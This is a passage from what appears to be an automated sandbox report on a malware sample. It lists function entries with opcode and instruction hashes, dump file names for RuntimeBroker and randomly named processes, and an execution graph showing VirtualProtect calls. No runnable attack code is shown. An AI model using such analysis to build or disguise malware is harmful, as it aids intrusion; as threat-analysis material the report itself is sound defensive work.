                                                                      • Opcode Fuzzy Hash: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction Fuzzy Hash: E8E04F3270D80F96FB75A750C8705BB3692EBD8719B264239C02AD25A1DE6CA7068641
                                                                      Function 00007FFD9B8CD459 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba736035fa633c8ca825ff0cf86fb36d06e0121df7aab2ba7dc9bf295e1baaf4
                                                                      • Instruction ID: 7d77ad6cb2987bc77775083f8f66ba844faddb3fd44bbf9729ae6690ead2ed18
                                                                      • Opcode Fuzzy Hash: ba736035fa633c8ca825ff0cf86fb36d06e0121df7aab2ba7dc9bf295e1baaf4
                                                                      • Instruction Fuzzy Hash: EBE08C2164A7804FC30E66389CA98543BB1DFAB21278A41DBC041CB6B3EA2ECC89C741
                                                                      Function 00007FFD9B8942E9 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b99b6b5d22d47ea923883779e40012544db1e3fde919004e5f3dc045a6f92c16
                                                                      • Instruction ID: 5d243420ebc4c397f754b19c668fb5781c7caed5ecff32e9c850732e9de71a96
                                                                      • Opcode Fuzzy Hash: b99b6b5d22d47ea923883779e40012544db1e3fde919004e5f3dc045a6f92c16
                                                                      • Instruction Fuzzy Hash: C5F02270518A1C8FCF98DB48C495EE9B7F1FB68305F154199914AE7260CB35AA80CF85
                                                                      Function 00007FFD9B8B91A9 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3c89a02c4191a3142e1c0e985e323deac79fb3db9ccaa47c497b739200f758cd
                                                                      • Instruction ID: 8b8c34f85137e0868dbb20e6eb0981472966af9f90bf3b0b39ec1eae5bb0345f
                                                                      • Opcode Fuzzy Hash: 3c89a02c4191a3142e1c0e985e323deac79fb3db9ccaa47c497b739200f758cd
                                                                      • Instruction Fuzzy Hash: 71E0127054F3C04FCB0AAB7488698543FB0AE6B21078F41EEC08ACF1B3E62D8949C701
                                                                      Function 00007FFD9B8A3B30 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                      Function 00007FFD9B8CA050 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFD9B8CA0E0 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFD9B892AD5 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction ID: 9f57dabdae326f99f93587561800b524ac45c405cfcda306ebea8823e06024e6
                                                                      • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction Fuzzy Hash: 35E01271F0D11A56FFA4A794D8617F966A0DB58300F1110B8D50ED33D1CD38AF418645
                                                                      Function 00007FFD9B8C7489 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9eec8148cdc11d20ca6e4a29fc37742d57f5518ec323d69221f0075981819f0b
                                                                      • Instruction ID: ebb476e041869fb9b3c971ffe5d6da40b05989d01fad73e43c37698f59567be2
                                                                      • Opcode Fuzzy Hash: 9eec8148cdc11d20ca6e4a29fc37742d57f5518ec323d69221f0075981819f0b
                                                                      • Instruction Fuzzy Hash: 76E01A6594E7C04FC70B9B3488B88547F60DE1721074A40EBC085CF2B3E5298949C711
                                                                      Function 00007FFD9B8CD4D9 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c12b24600996daff528c562a0a9ca3c030329e078465264730dea7850f23641e
                                                                      • Instruction ID: 0946180e54041b516ca7189a9017140664d13340f92fc9f56fb5c6a05218d10d
                                                                      • Opcode Fuzzy Hash: c12b24600996daff528c562a0a9ca3c030329e078465264730dea7850f23641e
                                                                      • Instruction Fuzzy Hash: A9E04F6194F7C04FC71BA73488788507FA0DE5721078A40EFC185CF5B3D5199849C712
                                                                      Function 00007FFD9B8CC7A9 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c8262d4a635fcdd9bd911250cd8432f4b751a528c8bcc8fa1772dcca1dfffdf9
                                                                      • Instruction ID: 012b1e8b9fceebd5ed2ad95eded0d7c9b0ee91a15502e2fb83c325f1afe833f3
                                                                      • Opcode Fuzzy Hash: c8262d4a635fcdd9bd911250cd8432f4b751a528c8bcc8fa1772dcca1dfffdf9
                                                                      • Instruction Fuzzy Hash: 2BE0173154A7C84FC30AAB749CB99543FB0EEAB21178B01D7D045CB6B3EA1E8D88C752
                                                                      Function 00007FFD9B8C8AF9 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 226fc8267aa11a770ddfa93aeebf5c346e660c4dea33991971a3f12b2e385b46
                                                                      • Instruction ID: 50a7127e8c417f4566172e8b9dbf396791b88f84637248cb58d4e2abd7bd6aad
                                                                      • Opcode Fuzzy Hash: 226fc8267aa11a770ddfa93aeebf5c346e660c4dea33991971a3f12b2e385b46
                                                                      • Instruction Fuzzy Hash: A6E0C23054A7C44FC30AA7648C788403FB1EE6B21178B40CBC005CF5B3EA0D8C48C742
                                                                      Function 00007FFD9B8C1C90 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFD9B8C3C80 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFD9B8CB388 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction ID: 43c17ab8deacb7067e5d0d38499529c0938a085f3d5cd66090e169f11640904d
                                                                      • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction Fuzzy Hash: 56D01234B559044FC71CB739885987473A1EB6E21779640A9D00ACB2B1D96AED89C781
                                                                      Function 00007FFD9B8C6A90 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction ID: b1a987d9646deeebcc95fb385dab26c671575aa57d32c955645e03adb8f13550
                                                                      • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction Fuzzy Hash: 7DD02234B548040FC70CBB3888588303390EB6E2277C140A9D00AC72B1E92ADC88C740
                                                                      Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6893c421d8ec3c24c2459ab3e7736549536c1dc703aebdbdcaee714463a39ecf
                                                                      • Instruction ID: a1592d64f44aef6646087a3d6f4792349c7178ea0843b085b4c9772da485db98
                                                                      • Opcode Fuzzy Hash: 6893c421d8ec3c24c2459ab3e7736549536c1dc703aebdbdcaee714463a39ecf
                                                                      • Instruction Fuzzy Hash: 45C04C06F6B61F01FC3677EF98660ACA9405FDDE10FD70172D54D400E19D4D22D54156
                                                                      Function 00007FFD9B891310 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction ID: 45700d14890448792f7a77ee4ad80256f46f31d6e75c6f2da8f924a925832783
                                                                      • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction Fuzzy Hash: F4C04C3455180D9FC958EB69C89591477A0FB1D315BD60090E409C7271E669DDD6C741
                                                                      Function 00007FFD9B8A685C Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 930dd795de9fa96c39b3a3dc93de49f779c1b9a10b594cbe09fb33c341a96781
                                                                      • Instruction ID: e66853bd5abbd316dd62931102c6f23c031e02e0e75b1562851458f6f8d88ce2
                                                                      • Opcode Fuzzy Hash: 930dd795de9fa96c39b3a3dc93de49f779c1b9a10b594cbe09fb33c341a96781
                                                                      • Instruction Fuzzy Hash: 6BD0C930D045298FEBA0DB548890BA8B2B1AF48300F5400F6800CE3295CA356DC0DB50
                                                                      Function 00007FFD9B894E17 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction ID: 76bd946553c2ef4ebd4a948394b85e23847e7e7cada1b332635ab29511e26127
                                                                      • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction Fuzzy Hash: 61C08CA1E2C20A95EB2496A048291AAB7818F09220F52867280ADA60A5DE2856025280
                                                                      Function 00007FFD9B892555 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b6d1330e56a7f32816c86f3e79505be41de0326bbcede5a2d850711bf99812c6
                                                                      • Instruction ID: 3cd58260524bae29fe61d09c45b4ffb5f95e604126dddfc9e68002d7dc8bce79
                                                                      • Opcode Fuzzy Hash: b6d1330e56a7f32816c86f3e79505be41de0326bbcede5a2d850711bf99812c6
                                                                      • Instruction Fuzzy Hash: 27C04C04F1881E56F75A6658443157E44D29B44754F9544B4E41ED76CECD1C591243C7
                                                                      Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction ID: b3f92d2a2f5a77ba122d8cd4cd5a1a83409582608cc8b965e381d36b81ceda09
                                                                      • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction Fuzzy Hash: 0FB01200E6740F00EC2433FB08520A478405B4C500FC20070D80E40091984D22940242

                                                                      Non-executed Functions

                                                                      Function 00007FFD9B8909B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 3886735fd86603637beb1b278350b42675a724268466b44f48847f05933f573d
                                                                      • Instruction ID: bf052793a3fd37f1244b75bb33fdb5bc94ce87890e76dd1f5b135db772e01080
                                                                      • Opcode Fuzzy Hash: 3886735fd86603637beb1b278350b42675a724268466b44f48847f05933f573d
                                                                      • Instruction Fuzzy Hash: 1D41D183B1853685E31F33FC79299ED5B84CF8527DB0842B7E16E8A0C76C88208392E5

                                                                      Execution Graph

                                                                      Execution Coverage:8.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:10
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 1667 7ffd9b88087a 1669 7ffd9b88b150 1667->1669 1668 7ffd9b88b2ca 1669->1668 1670 7ffd9b88b3f5 VirtualProtect 1669->1670 1671 7ffd9b88b42e 1670->1671 1672 7ffd9b880848 1674 7ffd9b88084d 1672->1674 1673 7ffd9b88b098 1674->1673 1675 7ffd9b88b3f5 VirtualProtect 1674->1675 1676 7ffd9b88b42e 1675->1676

                                                                      Executed Functions

                                                                      Function 00007FFD9B880848 Relevance: 2.1, APIs: 1, Instructions: 569COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 7ffd9b880848-7ffd9b88af3d 5 7ffd9b88afae-7ffd9b88afb5 0->5 6 7ffd9b88af3f-7ffd9b88af8c 0->6 7 7ffd9b88afb7-7ffd9b88afba 5->7 8 7ffd9b88afff-7ffd9b88b062 5->8 6->8 17 7ffd9b88af8e-7ffd9b88afa7 6->17 9 7ffd9b88afbc-7ffd9b88afcf 7->9 10 7ffd9b88aff4-7ffd9b88affc 7->10 19 7ffd9b88b06a-7ffd9b88b096 call 7ffd9b88b0ba 8->19 20 7ffd9b88b064 8->20 12 7ffd9b88afd1 9->12 13 7ffd9b88afd3-7ffd9b88afe6 9->13 10->8 12->13 13->13 16 7ffd9b88afe8-7ffd9b88aff0 13->16 16->10 17->5 24 7ffd9b88b107-7ffd9b88b117 19->24 25 7ffd9b88b098-7ffd9b88b09e 19->25 20->19 28 7ffd9b88b119-7ffd9b88b121 24->28 29 7ffd9b88b122-7ffd9b88b133 24->29 26 7ffd9b88b0a5-7ffd9b88b0b9 25->26 27 7ffd9b88b0a0 25->27 27->26 28->29 30 7ffd9b88b135-7ffd9b88b13d 29->30 31 7ffd9b88b13e-7ffd9b88b17d 29->31 30->31 33 7ffd9b88b1ee-7ffd9b88b1f1 31->33 34 7ffd9b88b17f-7ffd9b88b1d2 31->34 35 7ffd9b88b1e3 33->35 36 7ffd9b88b1f3-7ffd9b88b1fd 33->36 39 7ffd9b88b22d-7ffd9b88b294 34->39 47 7ffd9b88b1d4-7ffd9b88b1dd 34->47 38 7ffd9b88b1e5-7ffd9b88b1e8 35->38 35->39 40 7ffd9b88b1ff 36->40 41 7ffd9b88b201-7ffd9b88b214 36->41 42 7ffd9b88b1ea-7ffd9b88b1ed 38->42 43 7ffd9b88b222-7ffd9b88b22a 38->43 49 7ffd9b88b296 39->49 50 7ffd9b88b29c-7ffd9b88b2c8 call 7ffd9b88b2ec 39->50 40->41 41->41 44 7ffd9b88b216-7ffd9b88b21e 41->44 42->33 43->39 44->43 47->35 49->50 53 7ffd9b88b339-7ffd9b88b347 50->53 54 7ffd9b88b2ca-7ffd9b88b2d0 50->54 57 7ffd9b88b349-7ffd9b88b351 53->57 58 7ffd9b88b352-7ffd9b88b42c VirtualProtect 53->58 55 7ffd9b88b2d7-7ffd9b88b2eb 54->55 56 7ffd9b88b2d2 54->56 56->55 57->58 63 7ffd9b88b42e 58->63 64 7ffd9b88b434-7ffd9b88b45c 58->64 63->64
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.2322563022.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_7ffd9b880000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 91f25f59c304959dedd4b737871eaa79b87f6b55e116f9d87fd9fd492040831e
                                                                      • Instruction ID: 0facf23e84320a4d60010428bb3f8496820c8aefc58f3eecfd8d28180d3de9db
                                                                      • Opcode Fuzzy Hash: 91f25f59c304959dedd4b737871eaa79b87f6b55e116f9d87fd9fd492040831e
                                                                      • Instruction Fuzzy Hash: A3021630A0DB8D4FEB59DF68C8567E93BE1FF59310F04426EE45DC72A2DA74A8418B81

                                                                      Executed Functions

                                                                      Function 00007FFD9B8909AE Relevance: 1.2, Instructions: 1205COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b890000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 804a5bf04cc3e78f94b5659100fd47838ef64b70e95818f6020f4d8abee414cb
                                                                      • Instruction ID: 36e165d5800a8e621947a7fd1140648f2acb04621d990f293e288a660a3c0adf
                                                                      • Opcode Fuzzy Hash: 804a5bf04cc3e78f94b5659100fd47838ef64b70e95818f6020f4d8abee414cb
                                                                      • Instruction Fuzzy Hash: 36829321B1D95E8FEFA8FB5888A16B87792FFA8340F1505B9D01DC32E6DD34AD428741
                                                                      Function 00007FFD9B891029 Relevance: .9, Instructions: 882COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b890000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7aa8d51503d7fddf739037ed5a459aabf9d1c66922b9a8a5e2877cf1a2e975f5
                                                                      • Instruction ID: 38292d66cd872d0e1bd7f3bd90b7b12f7def71783101d56764c003de1531db0a
                                                                      • Opcode Fuzzy Hash: 7aa8d51503d7fddf739037ed5a459aabf9d1c66922b9a8a5e2877cf1a2e975f5
                                                                      • Instruction Fuzzy Hash: BE526231B1D95E8FEFA8EB5884A16B877A2FFA8300F1545B9D01DC32D6DE34AD428741
                                                                      Function 00007FFD9B8B1000 Relevance: .4, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f449070ee33cc32c4cb947360e1a17c79b9100543ad65f5c6f7126f75bb589ff
                                                                      • Instruction ID: a057c1ba5d8890ff3e233bd365ae711d62a5298e245e9af0773bbc7174fea901
                                                                      • Opcode Fuzzy Hash: f449070ee33cc32c4cb947360e1a17c79b9100543ad65f5c6f7126f75bb589ff
                                                                      • Instruction Fuzzy Hash: 72B1CD22B7D6AA0BE32D9B6C48920B573C1EB8A309B15877DC8DBC7457E928E50746C1
                                                                      Function 00007FFD9B880D78 Relevance: .3, Instructions: 261COMMON
                                                                      Download Yara Rule
